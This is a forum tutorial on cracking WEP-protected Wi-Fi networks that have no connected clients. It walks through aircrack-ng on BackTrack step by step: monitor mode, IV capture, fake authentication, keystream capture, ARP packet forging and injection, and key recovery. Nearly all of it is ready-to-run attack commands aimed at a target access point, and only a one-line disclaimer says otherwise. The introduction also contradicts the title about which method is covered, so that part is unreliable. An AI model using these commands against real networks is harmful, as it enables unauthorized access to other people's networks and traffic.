TheTAZZone - Internet Chaos

Tutorial- Cracking WEP with no Clients


TAZ Forum :: A Computer, Gaming, and Social Network Community of Friends :: TAZForum :: View topic – Tutorial- Cracking WEP with no Clients

Ok, this tutorial should be pretty straightforward and easy, then again, thats the entire idea behind a tutorial right? Anyway, to business, this tutorial will show you how to crack WEP very quickly using the aircrack on the backtrack security liveCD, that you can find here;

**quick note, cracking WEP with no clients will be out tonight/sometime real soon**

We will go over
1) Putting your atheros based card into monitor mode
2) Getting packet injection ready
3) injecting/sniffing
4) Cracking the WEP

This is the easier method, the one where the WEP has clients present, and you can use a deauth attack on them. Ok, enough talk, to business!

Monitor Mode

The first thing to do is boot up backtrack, basically by booting to a CD like you normally would, if you can’t figure this out, ask down below, or go use google. login to backtrack under root (password ‘toor’), and then type “startx” into the command line to start out GUI.

Sweet, now we are running *nix, and we can start the good stuff. Open up a command line, but clicking on the icon that looks like one on the bottom next to the ‘start’ type thingy (let me know if I get to technical Smile )

Now, we need to enter this into the command line;

$ airmon-ng start wifi0 6

**starts wifi0 on channel 6, change for the channel of the network you are attacking, use kismet for this, not covered in this tutorial**

$ wlanconfig ath0 destroy
$ ifconfig ath1 up
$ iwconfig ath1 mode monitor 6

Sweet, now we have our card in monitor mode, and we can move onto bigger and better things.

Start up Airodump and getting some info ready

ok, lets start airodump so we can get some info out of it, and then we can just leave it running.

$ airodump-ng –ivs –write bob –channel 6 ath1

**basically heres what each thing means;
–ivs= only write the weak IV’s, not every packet
–write= the prefix of the file we are writing to, so bob.ivs
–channel= the channel to scan on
ath1= our network device**

Now that airodump is running, we need to snag a couple pieces of information from it, 1) The MAC address of the AP we are attacking, it’ll be in the first column. 2) the essid of the network, i.e. “linksys”, or something similar.

Now, open up a new terminal (DON”T CLOSE AIRODUMP). type this line in;

$ export AP=mac_of_ap

Now we also have to get our mac address; this is easy in backtrack just type in the following;

$ macchanger –show ath1
**your output here**
export MAC=your_mac_address

This basically just stored those as variables, so you don’t have to type them a bunch of times in the coming steps.

Getting everything ready

Basically what we are going to do to the network, is fake authorize ourselves using aireplay. Then using the same program, we are going to grab some peices of packets out of the replies given by fakeauth, and use those to create an arp reply packet with packetforge, to inject into the network to create IV’s, so we can crack the key! Whew, lets get started!

First we need to set up, but NOT run our fake auth attack;

$ aireplay-ng -1 0 -e linksys -a $AP -h $MAC ath1

so, we are running aireplay attack 1, with no delay, linksys is the essid of the network we are attacking, -a is the MAC of the AP we are attacking, and -h is our MAC address. Don’t run this yet, we will soon enough.

Open up another command line, so we can get ready to sniff out the packets we need. Enter the following;

$ aireplay-ng -5 -b $AP -h $MAC

Cool, step 1 of 2 is done for getting ready to create IV’s, next we have to sniff a packet, and then create one of our own. So run the aireplay -5 command first, it will start to sniff the network, then run the first command. Eventually the -5 will find a packet that it can use, and it will ask you if you want to use it, say yes (type y and press enter). Now you can cancel the first command (stop it from fake auth’ing over and over) by pressing ctrl-c. Leave the window open.

Now, after we told aireplay-ng -5 yes, it should have created a .xor file. In the output, the name of it should be there. The line looks like this;

Saving Keystream in fragment-0215-124336.xor

**yours will be different**

Now, using this .xor file we can create an arp-reply package which we can inject to create weak IV’s. So in the same window we ran the aireplay-ng -5 command, type in the following;

$ packetforge-ng -0 -a $AP -h $MAC -k -l -y your_.xor_file.xor -w arp-request

That will generate what we need, now we can run the final injection command that will inject the arp-request packets. Enter the following;

aireplay-ng -2 -r arp-request ath1

*you will have to say yes again btw*

Now you get to watch your #data column in airodump (you didn’t close it did you?) skyrocket! Wait a few minutes, and when you have 100k packets (the #data column, 1 mil for 128 bit) run the following command to crack the key!

$ aircrack-ng -n 64 -b $AP *.ivs

**note, if its 128 bit, change 64 to 128**

There ya go! You have cracked WEP when there are no clients on the network!

**This is an education peice, you should not be cracking anybody elses network, it can get you fined/landed in jail, I take no responsibility for anything you do with this information**

Leave a Reply

Your email address will not be published. Required fields are marked *


If you'd like to advertise on The Mutt ( aka ) feel free to contact us at: administration[at]

TheTAZZone is a non-commercial entity. We do not sell any products or services ourselves. Our revenue comes from advertising and donations only.

We appreciate your support! Your advertising revenue ( or donations ) helps us to continue to upgrade, improve, and offset the costs of maintaining this site.

Donations can be made through the page ' Donate '.